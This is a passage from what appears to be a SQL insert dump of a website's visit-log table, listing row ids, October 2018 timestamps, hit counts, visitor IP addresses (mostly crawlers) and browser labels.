ther'),(313992,1538949027,1,1,0,0,'54.36.148.236','other'),(313993,1538949217,1,1,0,0,'54.36.148.243','other'),(313994,1538949562,1,1,0,0,'207.46.13.92','other'),(313995,1538949657,1,1,0,0,'18.197.20.133','chrome'),(313996,1538949715,1,1,0,0,'54.36.149.15','other'),(313997,1538949754,1,1,0,0,'8.29.198.25','other'),(313998,1538949764,2,2,0,0,'66.249.64.201','chrome'),(313999,1538949857,1,1,0,0,'66.249.64.199','chrome'),(314000,1538949992,1,1,0,0,'54.36.148.131','other'),(314001,1538950066,1,1,0,0,'66.249.64.195','chrome'),(314002,1538950332,1,1,0,0,'54.36.148.196','other'),(314003,1538950396,1,1,0,0,'54.36.149.25','other'),(314004,1538950478,4,4,0,0,'216.244.66.241','other'),(314005,1538950482,1,1,0,0,'54.36.149.30','other'),(314006,1538950765,1,1,0,0,'157.55.39.87','other'),(314007,1538951346,1,1,0,0,'54.36.148.122','other'),(314008,1538951668,1,1,0,0,'54.36.148.85','other'),(314009,1538951779,1,1,0,0,'54.36.148.55','other'),(314010,1538951854,1,1,0,0,'46.229.168.142','other'),(314011,1538951968,1,1,0,0,'54.36.148.198','other'),(314012,1538952124,1,1,0,0,'54.36.149.72','other'),(314013,1538952361,1,1,0,0,'54.36.148.217','other'),(314014,1538952382,1,1,0,0,'54.36.149.87','other'),(314015,1538952472,1,1,0,0,'54.36.149.37','other'),(314016,1538953021,1,1,0,0,'54.36.148.93','other'),(314017,1538953193,1,1,0,0,'54.36.148.236','other'),(314018,1538953383,1,1,0,0,'66.249.64.199','chrome'),(314019,1538953448,1,1,0,0,'54.36.148.53','other'),(314020,1538953567,1,1,0,0,'54.36.149.20','other'),(314021,1538953832,1,1,0,0,'54.36.148.104','other'),(314022,1538953910,1,1,0,0,'54.36.148.242','other'),(314023,1538954340,1,1,0,0,'66.249.64.61','chrome'),(314024,1538954530,1,1,0,0,'180.76.15.16','other'),(314025,1538954788,1,1,0,0,'54.36.148.72','other'),(314026,1538955443,1,1,0,0,'54.36.149.79','other'),(314027,1538955618,2,2,0,0,'216.244.66.241','other'),(314028,1538955640,1,1,0,0,'54.36.149.42','other'),(314029,1538955744,2,2,0,0,'8.29.198.25','other'),(314030,1538955752,1,1,0,0,'157.55.39.87','other'),(314031,1538955959,1,1,0,0,'54.36.148.123','other'),(314032,1538956026,1,1,0,0,'54.36.149.6','other'),(314033,1538956118,1,1,0,0,'54.36.148.127','other'),(314034,1538956531,1,1,0,0,'180.76.15.153','other'),(314035,1538956819,1,1,0,0,'95.28.229.72','msie'),(314036,1538956867,1,1,0,0,'54.36.148.18','other'),(314037,1538957314,1,1,0,0,'54.36.149.12','other'),(314038,1538957330,1,1,0,0,'207.46.13.92','other'),(314039,1538957475,1,1,0,0,'54.36.148.130','other'),(314040,1538957659,1,1,0,0,'54.36.149.50','other'),(314041,1538957688,1,1,0,0,'37.17.172.132','firefox'),(314042,1538957896,1,1,0,0,'66.249.64.199','chrome'),(314043,1538958189,1,1,0,0,'54.36.149.65','other'),(314044,1538958354,1,1,0,0,'54.36.148.194','other'),(314045,1538958355,1,1,0,0,'180.76.15.24','other'),(314046,1538958571,1,1,0,0,'54.36.149.29','other'),(314047,1538958697,2,2,0,0,'216.244.66.241','other'),(314048,1538958746,1,1,0,0,'54.36.148.82','other'),(314049,1538958794,1,1,0,0,'66.249.64.195','chrome'),(314050,1538958883,1,1,0,0,'66.249.64.199','chrome'),(314051,1538958924,2,2,0,0,'66.249.64.59','chrome'),(314052,1538958955,1,1,0,0,'54.36.149.12','other'),(314053,1538959273,1,1,0,0,'54.36.148.136','other'),(314054,1538959348,2,2,0,0,'66.249.64.201','chrome'),(314055,1538959450,1,1,0,0,'37.17.172.132','firefox'),(314056,1538959462,1,1,0,0,'54.36.149.56','other'),(314057,1538959732,1,1,0,0,'95.163.255.99','other'),(314058,1538960018,1,1,0,0,'54.36.148.171','other'),(314059,1538960137,1,1,0,0,'157.55.39.117','other'),(314060,1538960314,2,2,0,0,'66.249.64.199','chrome'),(314061,1538960348,1,1,0,0,'5.188.62.5','chrome'),(314062,1538960556,1,1,0,0,'54.36.148.112','other'),(314063,1538960571,1,1,0,0,'54.36.148.41','other'),(314064,1538960598,1,1,0,0,'8.29.198.26','other'),(314065,1538960747,1,1,0,0,'54.36.148.106','other'),(314066,1538960784,1,1,0,0,'54.36.148.38','other'),(314067,1538961139,1,1,0,0,'54.36.149.52','other'),(314068,1538961311,1,1,0,0,'18.184.112.40','other'),(314069,1538961316,1,1,0,0,'216.244.66.241','other'),(314070,1538961559,1,1,0,0,'54.36.148.197','other'),(314071,1538961631,1,1,0,0,'46.229.168.131','other'),(314072,1538961717,1,1,0,0,'54.36.148.21','other'),(314073,1538961739,1,1,0,0,'54.36.148.63','other'),(314074,1538961994,1,1,0,0,'54.36.148.243','other'),(314075,1538962085,1,1,0,0,'66.249.64.201','chrome'),(314076,1538962197,1,1,0,0,'66.249.64.195','chrome'),(314077,1538963298,1,1,0,0,'54.36.149.0','other'),(314078,1538963313,1,1,0,0,'95.163.255.94','other'),(314079,1538963493,1,1,0,0,'54.36.149.4','other'),(314080,1538963512,1,1,0,0,'54.36.148.28','other'),(314081,1538963612,1,1,0,0,'54.36.149.53','other'),(314082,1538963633,1,1,0,0,'54.36.148.160','other'),(314083,1538963759,1,1,0,0,'157.55.39.87','other'),(314084,1538963811,1,1,0,0,'66.249.64.201','chrome'),(314085,1538963838,1,1,0,0,'66.249.64.199','chrome'),(314086,1538964022,1,1,0,0,'54.36.149.16','other'),(314087,1538964156,1,1,0,0,'54.36.148.199','other'),(314088,1538964279,2,2,0,0,'66.249.64.195','chrome'),(314089,1538964523,1,1,0,0,'87.250.224.47','other'),(314090,1538964623,1,1,0,0,'37.9.113.103','other'),(314091,1538965022,1,1,0,0,'54.36.148.179','other'),(314092,1538965107,2,2,0,0,'66.249.64.201','chrome'),(314093,1538965136,1,1,0,0,'178.154.244.65','other'),(314094,1538965163,1,1,0,0,'54.36.148.181','other'),(314095,1538965192,1,1,0,0,'5.45.207.19','other'),(314096,1538965280,1,1,0,0,'66.249.64.59','chrome'),(314097,1538965331,1,1,0,0,'46.229.168.149','other'),(314098,1538965466,1,1,0,0,'66.249.64.57','chrome'),(314099,1538965487,1,1,0,0,'54.36.148.173','other'),(314100,1538965643,1,1,0,0,'37.9.113.148','other'),(314101,1538965704,5,5,0,0,'66.249.64.195','chrome'),(314102,1538965750,1,1,0,0,'178.154.244.29','other'),(314103,1538965791,1,1,0,0,'37.17.172.132','firefox'),(314104,1538965852,1,1,0,0,'54.36.149.106','other'),(314105,1538965854,1,1,0,0,'141.8.142.108','other'),(314106,1538965940,1,1,0,0,'54.36.148.118','other'),(314107,1538965978,2,2,0,0,'66.249.64.199','chrome'),(314108,1538966038,2,2,0,0,'66.249.64.201','chrome'),(314109,1538966120,1,1,0,0,'54.36.148.246','other'),(314110,1538966442,1,1,0,0,'54.36.148.23','other'),(314111,1538966450,1,1,0,0,'54.36.148.64','other'),(314112,1538966572,2,2,0,0,'8.29.198.26','other'),(314113,1538966757,1,1,0,0,'54.36.148.235','other'),(314114,1538966787,1,1,0,0,'54.36.148.107','other'),(314115,1538966986,1,1,0,0,'54.36.149.57','other'),(314116,1538966995,1,1,0,0,'54.36.148.65','other'),(314117,1538967130,1,1,0,0,'54.36.148.186','other'),(314118,1538967180,1,1,0,0,'54.36.148.86','other'),(314119,1538967315,1,1,0,0,'178.154.244.11','other'),(314120,1538967355,1,1,0,0,'178.154.244.29','other'),(314121,1538967682,1,1,0,0,'54.36.148.88','other'),(314122,1538968053,1,1,0,0,'54.36.148.188','other'),(314123,1538968054,2,2,0,0,'66.249.64.195','chrome'),(314124,1538968096,1,1,0,0,'54.36.149.59','other'),(314125,1538968454,1,1,0,0,'54.36.149.33','other'),(314126,1538968524,1,1,0,0,'66.249.64.199','chrome'),(314127,1538969027,1,1,0,0,'54.36.148.173','other'),(314128,1538969071,1,1,0,0,'54.36.148.89','other'),(314129,1538969138,1,1,0,0,'54.36.148.13','other'),(314130,1538969143,2,2,0,0,'178.154.244.29','other'),(314131,1538969145,1,1,0,0,'54.36.148.127','other'),(314132,1538969257,1,1,0,0,'54.36.149.60','other'),(314133,1538969261,1,1,0,0,'54.36.148.76','other'),(314134,1538969291,1,1,0,0,'54.36.148.159','other'),(314135,1538969573,1,1,0,0,'54.36.148.145','other'),(314136,1538969832,1,1,0,0,'66.249.64.195','chrome'),(314137,1538969887,1,1,0,0,'66.249.64.201','chrome'),(314138,1538970010,1,1,0,0,'54.36.148.97','other'),(314139,1538971318,1,1,0,0,'95.163.255.94','other'),(314140,1538971427,1,1,0,0,'8.29.198.25','other'),(314141,1538971851,1,1,0,0,'54.36.148.193','other'),(314142,1538972280,1,1,0,0,'54.36.148.126','other'),(314143,1538972540,1,1,0,0,'54.36.148.64','other'),(314144,1538972647,1,1,0,0,'54.36.149.88','other'),(314145,1538972739,2,2,0,0,'66.249.64.201','chrome'),(314146,1538972757,1,1,0,0,'54.36.148.109','other'),(314147,1538972803,2,2,0,0,'66.249.64.195','chrome'),(314148,1538972896,1,1,0,0,'46.229.168.130','other'),(314149,1538973729,1,1,0,0,'66.249.64.61','chrome'),(314150,1538973883,1,1,0,0,'54.36.149.49','other'),(314151,1538973917,2,2,0,0,'66.249.64.195','chrome'),(314152,1538974143,1,1,0,0,'54.36.148.214','other'),(314153,1538974222,1,1,0,0,'216.244.66.241','other'),(314154,1538974261,1,1,0,0,'54.36.149.2','other'),(314155,1538974405,1,1,0,0,'54.36.148.109','other'),(314156,1538974433,1,0,1,0,'66.249.64.59',''),(314157,1538974585,2,2,0,0,'178.154.244.29','other'),(314158,1538974697,1,1,0,0,'54.36.149.39','other'),(314159,1538974715,1,1,0,0,'54.36.148.193','other'),(314160,1538974880,1,1,0,0,'54.36.149.100','other'),(314161,1538975026,1,1,0,0,'193.106.30.98','firefox'),(314162,1538975159,1,1,0,0,'54.36.148.34','other'),(314163,1538975338,1,1,0,0,'54.36.149.6','other'),(314164,1538975449,1,1,0,0,'54.36.149.15','other'),(314165,1538975564,1,1,0,0,'54.36.149.57','other'),(314166,1538975582,1,1,0,0,'178.93.21.213','chrome'),(314167,1538975787,1,1,0,0,'54.36.148.73','other'),(314168,1538976709,1,1,0,0,'54.36.148.147','other'),(314169,1538976764,1,1,0,0,'54.36.148.66','other'),(314170,1538976999,1,1,0,0,'54.36.148.175','other'),(314171,1538977342,1,1,0,0,'54.36.148.33','other'),(314172,1538977352,3,2,1,0,'66.249.64.199',''),(314173,1538977414,1,1,0,0,'8.29.198.25','other'),(314174,1538977444,1,1,0,0,'66.249.64.201','chrome'),(314175,1538977502,1,1,0,0,'66.249.64.195','chrome'),(314176,1538977620,1,1,0,0,'54.36.148.63','other'),(314177,1538977704,1,1,0,0,'54.36.148.201','other'),(314178,1538977767,1,1,0,0,'8.29.198.27','other'),(314179,1538977968,1,1,0,0,'54.36.149.102','other'),(314180,1538978198,1,1,0,0,'54.36.149.5','other'),(314181,1538978506,2,2,0,0,'66.249.64.195','chrome'),(314182,1538978521,2,2,0,0,'216.244.66.241','other'),(314183,1538978572,2,2,0,0,'66.249.64.199','chrome'),(314184,1538978668,4,4,0,0,'66.249.64.201','chrome'),(314185,1538979258,1,1,0,0,'54.36.148.188','other'),(314186,1538979286,1,1,0,0,'66.249.64.61','chrome'),(314187,1538979334,2,2,0,0,'91.196.177.46','chrome'),(314188,1538979485,1,1,0,0,'157.55.39.87','other'),(314189,1538979817,1,1,0,0,'212.55.72.209','chrome'),(314190,1538980007,1,1,0,0,'54.36.148.111','other'),(314191,1538980046,1,1,0,0,'95.158.6.58','chrome'),(314192,1538980101,1,1,0,0,'54.36.149.22','other'),(314193,1538980462,1,1,0,0,'180.76.15.26','other'),(314194,1538980916,1,1,0,0,'54.36.149.53','other'),(314195,1538981440,1,1,0,0,'54.36.148.125','other'),(314196,1538981595,1,1,0,0,'178.154.244.29','other'),(314197,1538981869,1,1,0,0,'66.249.64.195','chrome'),(314198,1538982153,1,1,0,0,'40.77.167.72','other'),(314199,1538982251,1,1,0,0,'8.29.198.27','other'),(314200,1538982294,1,1,0,0,'54.36.148.115','other'),(314201,1538982686,1,1,0,0,'54.36.148.166','other'),(314202,1538982870,1,1,0,0,'78.111.190.155','chrome'),(314203,1538982959,2,2,0,0,'66.249.64.199','chrome'),(314204,1538983128,1,1,0,0,'54.36.148.154','other'),(314205,1538983358,1,1,0,0,'144.76.7.79','other'),(314206,1538983389,1,1,0,0,'54.36.148.60','other'),(314207,1538983410,1,1,0,0,'54.36.148.29','other'),(314208,1538983454,1,1,0,0,'95.163.255.97','other'),(314209,1538983456,3,3,0,0,'66.249.64.195','chrome'),(314210,1538983774,1,1,0,0,'80.91.174.180','chrome'),(314211,1538983927,2,2,0,0,'54.36.148.197','other'),(314212,1538983956,1,1,0,0,'54.36.149.43','other'),(314213,1538984105,1,1,0,0,'46.229.168.131','other'),(314214,1538984488,1,1,0,0,'54.36.148.222','other'),(314215,1538984663,1,1,0,0,'66.249.64.201','chrome'),(314216,1538985282,1,1,0,0,'54.36.149.83','other'),(314217,1538985771,1,1,0,0,'54.36.148.85','other'),(314218,1538985797,1,1,0,0,'91.196.178.169','chrome'),(314219,1538986039,1,1,0,0,'66.249.64.201','chrome'),(314220,1538986431,1,1,0,0,'37.73.57.249','chrome'),(314221,1538986802,1,1,0,0,'54.36.148.47','other'),(314222,1538986812,1,1,0,0,'54.36.148.189','other'),(314223,1538986816,1,1,0,0,'54.36.148.196','other'),(314224,1538987280,2,2,0,0,'66.249.64.199','chrome'),(314225,1538987323,1,1,0,0,'66.249.64.195','chrome'),(314226,1538987597,1,1,0,0,'37.17.172.132','firefox'),(314227,1538987848,1,1,0,0,'207.46.13.92','other'),(314228,1538987908,1,1,0,0,'80.91.174.180','chrome'),(314229,1538987949,1,1,0,0,'54.36.148.89','other'),(314230,1538987951,1,1,0,0,'54.36.149.62','other'),(314231,1538987994,1,1,0,0,'91.196.178.166','chrome'),(314232,1538988233,1,1,0,0,'66.249.64.57','chrome'),(314233,1538988247,1,1,0,0,'8.29.198.26','other'),(314234,1538988595,1,1,0,0,'8.29.198.27','other'),(314235,1538989054,1,1,0,0,'216.244.66.241','other'),(314236,1538989141,2,2,0,0,'66.249.64.199','chrome'),(314237,1538989203,1,1,0,0,'54.36.148.40','other'),(314238,1538989240,1,1,0,0,'66.249.64.201','chrome'),(314239,1538989294,9,9,0,0,'23.237.4.26','other'),(314240,1538989345,1,1,0,0,'66.249.64.195','chrome'),(314241,1538989422,2,2,0,0,'178.154.244.29','other'),(314242,1538989992,1,1,0,0,'54.36.148.90','other'),(314243,1538990162,1,1,0,0,'54.36.149.59','other'),(314244,1538990200,1,1,0,0,'54.36.149.79','other'),(314245,1538990227,1,1,0,0,'91.196.178.92','firefox'),(314246,1538990438,1,1,0,0,'54.36.148.26','other'),(314247,1538990604,1,1,0,0,'178.154.244.29','other'),(314248,1538990643,1,1,0,0,'37.55.59.240','chrome'),(314249,1538990734,1,1,0,0,'54.36.148.92','other'),(314250,1538990962,1,1,0,0,'185.189.114.123','chrome'),(314251,1538991121,1,1,0,0,'54.36.148.41','other'),(314252,1538991326,2,2,0,0,'66.249.64.195','chrome'),(314253,1538991382,1,1,0,0,'54.36.148.197','other'),(314254,1538992334,1,1,0,0,'94.153.139.254','chrome'),(314255,1538992349,1,1,0,0,'54.36.149.83','other'),(314256,1538992384,1,1,0,0,'216.244.66.241','other'),(314257,1538992397,1,1,0,0,'54.36.148.253','other'),(314258,1538992429,1,1,0,0,'54.36.148.184','other'),(314259,1538992497,1,1,0,0,'54.36.148.225','other'),(314260,1538992925,1,1,0,0,'66.249.64.61','chrome'),(314261,1538993084,1,1,0,0,'8.29.198.25','other'),(314262,1538993153,1,1,0,0,'66.249.64.201','chrome'),(314263,1538993162,2,2,0,0,'66.249.64.195','chrome'),(314264,1538993178,1,1,0,0,'66.249.64.199','chrome'),(314265,1538993466,1,1,0,0,'178.154.244.29','other'),(314266,1538993843,1,1,0,0,'54.36.148.139','other'),(314267,1538993885,1,1,0,0,'88.135.215.163','chrome'),(314268,1538994202,1,1,0,0,'54.36.148.229','other'),(314269,1538994350,1,1,0,0,'66.249.64.199','chrome'),(314270,1538994679,1,1,0,0,'66.249.64.195','chrome'),(314271,1538994827,1,1,0,0,'54.36.149.60','other'),(314272,1538994994,1,1,0,0,'216.244.66.241','other'),(314273,1538995304,2,2,0,0,'178.154.244.29','other'),(314274,1538995345,1,1,0,0,'66.249.64.61','chrome'),(314275,1538995424,1,1,0,0,'66.249.64.199','chrome'),(314276,1538996091,1,1,0,0,'54.36.149.52','other'),(314277,1538996506,1,1,0,0,'54.36.149.89','other'),(314278,1538996566,1,1,0,0,'107.178.194.16','chrome'),(314279,1538996573,2,2,0,0,'66.249.64.199','chrome'),(314280,1538996726,1,1,0,0,'66.249.64.195','chrome'),(314281,1538996789,1,1,0,0,'66.249.64.201','chrome'),(314282,1538997210,1,1,0,0,'180.76.15.34','other'),(314283,1538997548,1,1,0,0,'91.196.178.175','chrome'),(314284,1538997658,1,1,0,0,'54.36.148.16','other'),(314285,1538997695,1,1,0,0,'216.244.66.241','other'),(314286,1538997811,1,1,0,0,'66.249.64.199','chrome'),(314287,1538997834,1,1,0,0,'95.132.15.39','firefox'),(314288,1538997837,1,1,0,0,'54.36.148.70','other'),(314289,1538998622,1,1,0,0,'54.36.148.48','other'),(314290,1538999073,2,2,0,0,'8.29.198.27','other'),(314291,1538999277,1,1,0,0,'66.102.9.40','chrome'),(314292,1538999309,1,1,0,0,'66.249.64.201','chrome'),(314293,1538999345,1,1,0,0,'54.36.148.190','other'),(314294,1538999417,1,1,0,0,'91.196.178.169','chrome'),(314295,1538999469,1,1,0,0,'66.249.64.61','chrome'),(314296,1538999512,1,1,0,0,'54.36.148.218','other'),(314297,1538999550,2,2,0,0,'130.180.209.207','chrome'),(314298,1538999791,1,1,0,0,'66.249.64.59','chrome'),(314299,1538999862,1,1,0,0,'54.36.148.125','other'),(314300,1538999969,2,2,0,0,'88.135.215.163','chrome'),(314301,1539000181,1,1,0,0,'144.76.91.79','other'),(314302,1539000234,1,1,0,0,'91.196.178.93','chrome'),(314303,1539000247,1,1,0,0,'216.244.66.241','other'),(314304,1539000363,2,2,0,0,'66.249.64.195','chrome'),(314305,1539000366,1,1,0,0,'66.249.64.199','chrome'),(314306,1539001123,1,1,0,0,'54.36.148.102','other'),(314307,1539001178,1,1,0,0,'66.249.64.201','chrome'),(314308,1539001533,1,1,0,0,'54.36.148.74','other'),(314309,1539001627,6,6,0,0,'66.249.64.195','chrome'),(314310,1539001707,1,1,0,0,'157.55.39.87','other'),(314311,1539001779,2,2,0,0,'144.76.120.197','other'),(314312,1539001786,3,3,0,0,'66.249.64.199','chrome'),(314313,1539001817,1,1,0,0,'91.196.178.79','chrome'),(314314,1539001898,1,1,0,0,'54.36.148.233','other'),(314315,1539002169,1,1,0,0,'66.249.64.201','chrome'),(314316,1539002181,1,1,0,0,'54.36.148.87','other'),(314317,1539002318,1,1,0,0,'54.36.148.170','other'),(314318,1539002431,1,1,0,0,'54.36.149.1','other'),(314319,1539002512,1,1,0,0,'54.36.148.107','other'),(314320,1539003194,1,1,0,0,'54.36.149.10','other'),(314321,1539003260,1,1,0,0,'37.73.57.249','chrome'),(314322,1539003488,1,1,0,0,'54.36.148.59','other'),(314323,1539003516,2,2,0,0,'66.249.64.195','chrome'),(314324,1539003541,1,1,0,0,'66.249.64.201','chrome'),(314325,1539003573,1,1,0,0,'66.249.64.199','chrome'),(314326,1539003739,1,1,0,0,'37.17.172.132','firefox'),(314327,1539003867,1,1,0,0,'54.36.148.34','other'),(314328,1539003900,1,1,0,0,'54.36.148.114','other'),(314329,1539003914,1,1,0,0,'8.29.198.27','other'),(314330,1539003920,1,1,0,0,'95.163.255.96','other'),(314331,1539004416,2,2,0,0,'207.46.13.113','other'),(314332,1539004538,1,1,0,0,'54.36.148.140','other'),(314333,1539004671,1,1,0,0,'54.36.148.211','other'),(314334,1539004939,1,1,0,0,'54.36.149.7','other'),(314335,1539005255,1,1,0,0,'91.196.177.46','chrome'),(314336,1539005531,1,1,0,0,'54.36.148.84','other'),(314337,1539005553,1,1,0,0,'54.36.148.253','other'),(314338,1539005586,1,1,0,0,'91.196.178.93','chrome'),(314339,1539005820,1,1,0,0,'157.55.39.87','other'),(314340,1539006246,1,1,0,0,'54.36.148.232','other'),(314341,1539006466,1,1,0,0,'207.46.13.222','other'),(314342,1539006468,1,1,0,0,'66.249.64.59','chrome'),(314343,1539006496,1,1,0,0,'66.249.64.195','chrome'),(314344,1539006582,1,1,0,0,'54.36.148.109','other'),(314345,1539006923,2,2,0,0,'66.249.64.199','chrome'),(314346,1539007008,1,1,0,0,'54.36.148.210','other'),(314347,1539007095,2,2,0,0,'193.108.51.34','chrome'),(314348,1539007334,1,1,0,0,'54.36.148.84','other'),(314349,1539007380,1,1,0,0,'54.36.148.230','other'),(314350,1539007545,1,1,0,0,'66.249.65.211','chrome'),(314351,1539007595,1,1,0,0,'54.36.148.115','other'),(314352,1539007616,1,1,0,0,'66.249.64.195','chrome'),(314353,1539007727,1,1,0,0,'54.36.149.38','other'),(314354,1539008002,1,1,0,0,'193.108.51.34','chrome'),(314355,1539008025,1,1,0,0,'54.36.148.195','other'),(314356,1539008158,1,1,0,0,'54.36.148.113','other'),(314357,1539008239,1,1,0,0,'54.36.148.90','other'),(314358,1539008436,1,1,0,0,'95.158.6.58','chrome'),(314359,1539008530,1,1,0,0,'79.143.185.25','other'),(314360,1539008937,1,1,0,0,'193.108.51.34','chrome'),(314361,1539008939,1,1,0,0,'66.249.64.201','chrome'),(314362,1539009184,1,1,0,0,'66.249.64.199','chrome'),(314363,1539009419,1,1,0,0,'54.36.148.58','other'),(314364,1539009642,6,6,0,0,'5.9.141.8','other'),(314365,1539009755,1,1,0,0,'66.249.64.195','chrome'),(314366,1539009819,1,1,0,0,'54.36.148.119','other'),(314367,1539009921,1,1,0,0,'8.29.198.25','other'),(314368,1539010201,1,1,0,0,'54.36.149.4','other'),(314369,1539010254,1,1,0,0,'8.29.198.27','other'),(314370,1539010453,1,1,0,0,'54.36.149.20','other'),(314371,1539010488,2,2,0,0,'207.46.13.113','other'),(314372,1539010684,2,2,0,0,'216.244.66.241','other'),(314373,1539010802,3,3,0,0,'66.249.64.199','chrome'),(314374,1539010834,1,1,0,0,'54.36.148.103','other'),(314375,1539011061,1,1,0,0,'178.154.244.29','other'),(314376,1539011500,1,1,0,0,'91.196.178.80','firefox'),(314377,1539011587,1,1,0,0,'157.55.39.87','other'),(314378,1539012174,1,1,0,0,'66.249.64.201','chrome'),(314379,1539012929,3,3,0,0,'178.154.244.29','other'),(314380,1539012933,1,1,0,0,'5.45.207.79','other'),(314381,1539012934,2,2,0,0,'5.45.207.19','other'),(314382,1539012982,1,1,0,0,'37.9.113.103','other'),(314383,1539013210,3,3,0,0,'216.244.66.241','other'),(314384,1539013384,1,1,0,0,'54.208.102.37','other'),(314385,1539013389,1,1,0,0,'188.163.18.252','chrome'),(314386,1539013625,1,1,0,0,'54.36.148.101','other'),(314387,1539013764,1,1,0,0,'54.36.148.78','other'),(314388,1539013922,5,5,0,0,'178.154.244.29','other'),(314389,1539014018,1,1,0,0,'91.196.178.175','chrome'),(314390,1539014437,1,1,0,0,'54.36.148.251','other'),(314391,1539014742,1,1,0,0,'8.29.198.27','other'),(314392,1539015052,1,1,0,0,'54.36.148.112','other'),(314393,1539015104,6,6,0,0,'216.244.66.241','other'),(314394,1539015441,1,1,0,0,'54.36.148.136','other'),(314395,1539015588,1,1,0,0,'5.45.207.19','other'),(314396,1539015625,1,1,0,0,'54.36.149.5','other'),(314397,1539015647,1,1,0,0,'178.154.244.11','other'),(314398,1539015723,1,1,0,0,'54.36.148.113','other'),(314399,1539015735,1,1,0,0,'37.17.172.132','firefox'),(314400,1539015740,1,1,0,0,'178.154.244.29','other'),(314401,1539015864,1,1,0,0,'54.36.149.32','other'),(314402,1539016127,1,1,0,0,'66.249.64.201','chrome'),(314403,1539016129,1,1,0,0,'54.36.148.94','other'),(314404,1539016249,1,1,0,0,'66.249.64.131','chrome'),(314405,1539016390,1,1,0,0,'54.36.148.199','other'),(314406,1539016426,1,1,0,0,'95.108.181.54','other'),(314407,1539016459,8,8,0,0,'207.46.13.168','other'),(314408,1539016592,1,1,0,0,'46.229.168.145','other'),(314409,1539016597,17,17,0,0,'207.46.13.210','other'),(314410,1539017082,1,1,0,0,'54.36.148.112','other'),(314411,1539017389,1,1,0,0,'180.76.15.22','other'),(314412,1539017583,1,1,0,0,'66.249.64.135','chrome'),(314413,1539017858,1,1,0,0,'66.249.64.131','chrome'),(314414,1539018513,1,1,0,0,'54.36.148.46','other'),(314415,1539018625,2,2,0,0,'66.249.64.137','chrome'),(314416,1539018783,1,1,0,0,'54.36.148.23','other'),(314417,1539019102,1,1,0,0,'46.211.44.64','other'),(314418,1539019166,1,1,0,0,'95.163.255.98','other'),(314419,1539019534,1,1,0,0,'54.36.149.32','other'),(314420,1539019648,1,1,0,0,'207.46.13.210','other'),(314421,1539019710,1,1,0,0,'207.46.13.168','other'),(314422,1539020186,11,11,0,0,'40.77.167.1','other'),(314423,1539020553,1,1,0,0,'54.36.148.228','other'),(314424,1539020716,1,1,0,0,'66.249.70.29','chrome'),(314425,1539020763,2,2,0,0,'8.29.198.26','other'),(314426,1539021012,1,1,0,0,'216.244.66.241','other'),(314427,1539021219,1,1,0,0,'54.36.148.42','other'),(314428,1539021295,1,1,0,0,'54.36.148.10','other'),(314429,1539021357,2,2,0,0,'66.249.64.137','chrome'),(314430,1539021462,1,1,0,0,'54.36.148.50','other'),(314431,1539021506,2,2,0,0,'5.9.108.254','other'),(314432,1539021719,1,1,0,0,'54.36.148.18','other'),(314433,1539022337,1,1,0,0,'66.249.64.131','chrome'),(314434,1539022447,1,1,0,0,'54.36.148.167','other'),(314435,1539022679,1,1,0,0,'91.196.178.34','chrome'),(314436,1539023130,1,1,0,0,'54.36.148.189','other'),(314437,1539023163,1,1,0,0,'54.36.148.94','other'),(314438,1539023166,1,1,0,0,'54.36.148.25','other'),(314439,1539023209,1,1,0,0,'54.36.149.14','other'),(314440,1539023299,2,2,0,0,'66.249.64.135','chrome'),(314441,1539023421,1,1,0,0,'66.249.64.137','chrome'),(314442,1539023493,1,1,0,0,'54.36.149.60','other'),(314443,1539023516,1,1,0,0,'66.249.64.131','chrome'),(314444,1539023529,1,1,0,0,'54.36.149.99','other'),(314445,1539023602,1,1,0,0,'95.216.41.162','other'),(314446,1539024549,1,1,0,0,'54.36.148.219','other'),(314447,1539024584,1,1,0,0,'54.36.148.23','other'),(314448,1539024893,1,1,0,0,'180.76.15.26','other'),(314449,1539024990,1,1,0,0,'46.229.168.144','other'),(314450,1539025082,1,1,0,0,'54.36.149.21','other'),(314451,1539025103,1,1,0,0,'54.36.149.58','other'),(314452,1539025296,2,2,0,0,'66.249.64.131','chrome'),(314453,1539025575,1,1,0,0,'8.29.198.25','other'),(314454,1539025742,1,1,0,0,'91.196.178.181','chrome'),(314455,1539025757,1,1,0,0,'54.36.148.71','other'),(314456,1539026282,1,1,0,0,'216.244.66.241','other'),(314457,1539026587,1,1,0,0,'54.36.149.53','other'),(314458,1539026777,1,1,0,0,'66.249.64.135','chrome'),(314459,1539026953,1,1,0,0,'54.36.149.47','other'),(314460,1539027248,2,2,0,0,'207.46.13.222','other'),(314461,1539027353,1,1,0,0,'66.249.64.131','chrome'),(314462,1539027424,1,1,0,0,'54.36.149.48','other'),(314463,1539028418,1,1,0,0,'54.36.148.90','other'),(314464,1539028683,1,1,0,0,'54.36.148.47','other'),(314465,1539028730,1,1,0,0,'54.36.148.85','other'),(314466,1539029042,1,1,0,0,'54.36.148.113','other'),(314467,1539029078,1,1,0,0,'54.36.149.9','other'),(314468,1539029571,1,1,0,0,'54.36.149.63','other'),(314469,1539029930,1,1,0,0,'54.36.149.41','other'),(314470,1539030030,1,1,0,0,'54.36.148.22','other'),(314471,1539030297,1,1,0,0,'54.36.149.8','other'),(314472,1539030602,1,1,0,0,'54.36.149.28','other'),(314473,1539030718,1,1,0,0,'95.152.62.125','chrome'),(314474,1539030792,1,1,0,0,'207.46.13.46','other'),(314475,1539030971,1,1,0,0,'54.36.148.208','other'),(314476,1539031113,1,1,0,0,'54.36.148.107','other'),(314477,1539031140,1,1,0,0,'54.36.148.57','other'),(314478,1539031285,1,1,0,0,'54.36.148.241','other'),(314479,1539031597,2,2,0,0,'8.29.198.26','other'),(314480,1539031710,1,1,0,0,'54.36.148.142','other'),(314481,1539031803,1,1,0,0,'54.36.148.47','other'),(314482,1539032112,1,1,0,0,'66.249.64.131','chrome'),(314483,1539032510,1,1,0,0,'54.36.148.146','other'),(314484,1539032701,1,1,0,0,'66.249.70.27','chrome'),(314485,1539032730,1,1,0,0,'54.36.149.4','other'),(314486,1539032978,1,1,0,0,'207.46.13.159','other'),(314487,1539033236,1,1,0,0,'66.249.64.137','chrome'),(314488,1539033312,1,1,0,0,'54.36.148.93','other'),(314489,1539033347,1,1,0,0,'66.249.64.131','chrome'),(314490,1539033352,1,1,0,0,'54.36.149.0','other'),(314491,1539033466,1,1,0,0,'157.55.39.97','other'),(314492,1539033496,1,1,0,0,'54.36.149.93','other'),(314493,1539033566,1,1,0,0,'54.36.148.42','other'),(314494,1539033622,1,1,0,0,'54.36.148.120','other'),(314495,1539033636,1,1,0,0,'54.36.149.35','other'),(314496,1539033651,1,1,0,0,'207.46.13.46','other'),(314497,1539033988,1,1,0,0,'54.36.149.77','other'),(314498,1539034033,1,1,0,0,'91.209.11.236','other'),(3